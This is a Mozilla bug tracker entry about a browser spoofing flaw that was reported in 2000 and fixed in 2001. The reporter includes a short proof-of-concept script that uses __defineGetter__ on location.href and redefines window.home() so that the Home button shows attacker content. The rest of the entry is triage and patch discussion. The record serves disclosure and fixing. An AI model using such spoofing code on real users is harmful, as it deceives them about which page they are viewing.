Closed Bug 44014 Opened 24 years ago Closed 24 years ago

spoofing user's "Home"

Categories: Core :: Security, defect, P2
Tracking: VERIFIED FIXED, mozilla0.9.1
People: Reporter: security-bugs, Assigned: security-bugs
Details: Whiteboard: [need reviews]
Attachments: 1 file
Date: Mon, 26 Jun 2000 16:48:03 +0300
From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>

It is possible to change the behavior of clicking the "Home" button or choosing "Go|Home" from the menu. The exploit uses __defineGetter__ and redefinition of window.home(). I think that allowing redefinition of predefined functions is not a good idea.

The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2 seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
  a.location.__defineGetter__("href",function() {return "http://www.yahoo.com"});
  a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
  a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
This testcase does not behave as described, but the vulnerabilities mentioned should be addressed.
Status: NEW → ASSIGNED
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit and look at the issue of redefining properties.
Target Milestone: --- → M18
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for __defineGetter__, this should be fixed now, I think.
Depends on: 36946
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect of this bug. Patrick, can you give me a + ?
Keywords: rtm
I've posted jst's patch which adds JSPROP_PERMANENT to the location property. This doesn't completely fix the problem. Looks like we have to protect location.href as well.
Mitch, are you happy with the patch in this bug? Can it go to reviews? (Is it OK to strcmp against "LOCATION" vs "location" or using strcasecmp?) The fix is reasonably small. If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
This patch is not a complete fix. We need to restrict "location.href" as well. I'll see about getting this done.
QA Contact: czhang → junruh
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
Keywords: rtm
removing rtm.
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
Georgi thinks this is no longer an issue. You can still redefine window.home() but this doesn't change the behavior of the Home button anymore. There are a few other bugs dealing with redefining built-in properties, but that's covered elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
Removing NS_Confidential flag.
Group: netscapeconfidential?